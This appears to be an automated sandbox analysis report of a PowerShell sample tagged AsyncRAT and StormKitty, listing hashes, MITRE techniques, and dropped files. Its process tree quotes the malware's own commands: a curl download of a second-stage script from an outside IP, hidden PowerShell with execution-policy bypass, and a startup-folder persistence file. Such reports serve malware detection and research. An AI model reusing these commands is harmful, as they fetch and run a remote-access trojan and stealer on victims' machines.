asyncrat | e35d7ef701e2a95c6a9f13e379aeb8aac96dd99573e02d87daee3dd120322bce

General

Target

file01.ps1
Size

49B
MD5

0758afe276a0b0cd5f4f152b256c2bb4
SHA1

bac13aeb38a66e5df9add1b542cc10a2165dcf35
SHA256

e35d7ef701e2a95c6a9f13e379aeb8aac96dd99573e02d87daee3dd120322bce
SHA512

919d93999119f069490b03bcb5153a3f35cd43d1814d1b924ea422c6d6528ff8e78b3643507993f8950c78fe0290cc1c23a0e709fb5854f6ddae2d7802576f8d

Score

10^/10

asyncrat stormkitty discovery execution rat stealer

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral2/memory/5004-49-0x0000000000400000-0x0000000000704000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	3660	powershell.exe
6	3660	powershell.exe
18	2708	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3660	powershell.exe
2708	powershell.exe

Downloads MZ/PE file

Drops startup file 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.url	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2708 set thread context of 5004	2708	powershell.exe	91

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
3660	powershell.exe
2708	powershell.exe
2708	powershell.exe
5004	RegAsm.exe
5004	RegAsm.exe
5004	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3660	powershell.exe
Token: SeDebugPrivilege	2708	powershell.exe
Token: SeDebugPrivilege	5004	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
5004	RegAsm.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 3660 wrote to memory of 2432	3660	powershell.exe	84
PID 3660 wrote to memory of 2432	3660	powershell.exe	84
PID 2432 wrote to memory of 4336	2432	cmd.exe	85
PID 2432 wrote to memory of 4336	2432	cmd.exe	85
PID 2432 wrote to memory of 2708	2432	cmd.exe	86
PID 2432 wrote to memory of 2708	2432	cmd.exe	86
PID 4336 wrote to memory of 1488	4336	cmd.exe	87
PID 4336 wrote to memory of 1488	4336	cmd.exe	87
PID 2708 wrote to memory of 2920	2708	powershell.exe	88
PID 2708 wrote to memory of 2920	2708	powershell.exe	88
PID 2920 wrote to memory of 4572	2920	csc.exe	89
PID 2920 wrote to memory of 4572	2920	csc.exe	89
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91
PID 2708 wrote to memory of 5004	2708	powershell.exe	91

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\file01.ps1
1⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3660
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Modules.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2432
- - C:\Windows\system32\cmd.exe
    cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4336
  - - C:\Windows\system32\curl.exe
      curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
      4⤵
      PID:1488
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2708
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uq0eucep\uq0eucep.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2920
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp" "c:\Users\Admin\AppData\Local\Temp\uq0eucep\CSCB96C2DFE978346B29D2C467BFC38A8B6.TMP"
        5⤵
        
        PID:4572
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9D98.tmp

Filesize
1KB

MD5
b549bed1f7b4c52ab31b191f160ccd03

SHA1
3666185c90a3f4d7607283ab1b9656419005a186

SHA256
2ea30b1250a2e5fe71645fd4036e6e1db393dbc1b4e9b2d5fffcc6c9a660ef53

SHA512
313d517b2d2c90f0c8950cf48d1985bfdbe235a648dfc6b0474980e817117a13fb62d0cb1b583fe51c7fdaf5e4ae18ba0c4cfb18c05d89f8e7cd143e4bbb1096

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y15utwdb.20z.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\uq0eucep\uq0eucep.dll

Filesize
9KB

MD5
b5a15f0672a4a6445159a313ae707b64

SHA1
9707b324767ac1f5bdf88d3f356329f9535aacb1

SHA256
331f6089c051062c7d48b198acf9262716845158534e8456c8243961685f9755

SHA512
ef609885b354831cfb9cdee0094a287615f5a968268f10db6a798b5410ba8e4fe25fe202cd4707247cce5730a7a9fc6b8d8529b651e4fa61eeec6a6151f69f36

Download Submit
C:\Windows\Temp\Modules.bat

Filesize
3KB

MD5
bb445d197063475c8d78de4f0825753c

SHA1
158a8e3b278affe7c1185aad67683e4253cf53dd

SHA256
7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

SHA512
173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uq0eucep\CSCB96C2DFE978346B29D2C467BFC38A8B6.TMP

Filesize
652B

MD5
0139ea2c75defb889a3a1907628b9069

SHA1
fdf3093cecc56f1915094762448eaa4c95ae9eee

SHA256
3bff4506e06eeb66618437fa7cde74a8dee8d52d2587e1502e0dc2546a404b26

SHA512
eaf5391500de7a70535de1a24f14ee4ced94b179572349e7f1587467de04494658d2e43c4bfc298bf54b2970a9263e5316d9d8752771b7563097b403a302afc3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uq0eucep\uq0eucep.0.cs

Filesize
10KB

MD5
b5c3a2d03ff4c721192716f326c77dea

SHA1
6b754fd988ca58865674b711aba76d3c6b2c5693

SHA256
ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

SHA512
d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uq0eucep\uq0eucep.cmdline

Filesize
204B

MD5
3620928aa67afa610be430c66b3f733e

SHA1
2bb0084a184043cd1c44cf67c6e7e9c720bc4c04

SHA256
697106b9751b1de3f95250e92b690ca79e6fbe8af84b25e00d2b5b55b0086819

SHA512
cbc71c1f6277d0c65d1d4b14cb2fca294809f7234cd23c571c034528831e372a300fc207d797096a03cc412a296f4b7d83da8a9172f1ea851140ff892e148120

Download Submit
memory/2708-47-0x000001611A750000-0x000001611A758000-memory.dmp

Filesize
32KB

Download
memory/2708-21-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/2708-22-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/2708-32-0x000001617E830000-0x000001617E874000-memory.dmp

Filesize
272KB

Download
memory/2708-33-0x000001617EAA0000-0x000001617EB16000-memory.dmp

Filesize
472KB

Download
memory/2708-34-0x000001611A530000-0x000001611A540000-memory.dmp

Filesize
64KB

Download
memory/2708-51-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/2708-20-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/3660-11-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/3660-12-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/3660-18-0x00007FFAC2650000-0x00007FFAC3111000-memory.dmp

Filesize
10.8MB

Download
memory/3660-10-0x000001BDD3170000-0x000001BDD3192000-memory.dmp

Filesize
136KB

Download
memory/3660-0-0x00007FFAC2653000-0x00007FFAC2655000-memory.dmp

Filesize
8KB

Download
memory/5004-49-0x0000000000400000-0x0000000000704000-memory.dmp

Filesize
3.0MB

Download
memory/5004-52-0x00000000055A0000-0x0000000005B44000-memory.dmp

Filesize
5.6MB

Download
memory/5004-53-0x00000000054F0000-0x0000000005582000-memory.dmp

Filesize
584KB

Download
memory/5004-54-0x0000000005460000-0x000000000546A000-memory.dmp

Filesize
40KB

Download
memory/5004-57-0x0000000006570000-0x000000000660C000-memory.dmp

Filesize
624KB

Download
memory/5004-58-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/5004-59-0x0000000006930000-0x0000000006952000-memory.dmp

Filesize
136KB

Download
memory/5004-60-0x0000000006960000-0x0000000006CB4000-memory.dmp

Filesize
3.3MB

Download

Analysis

Sharing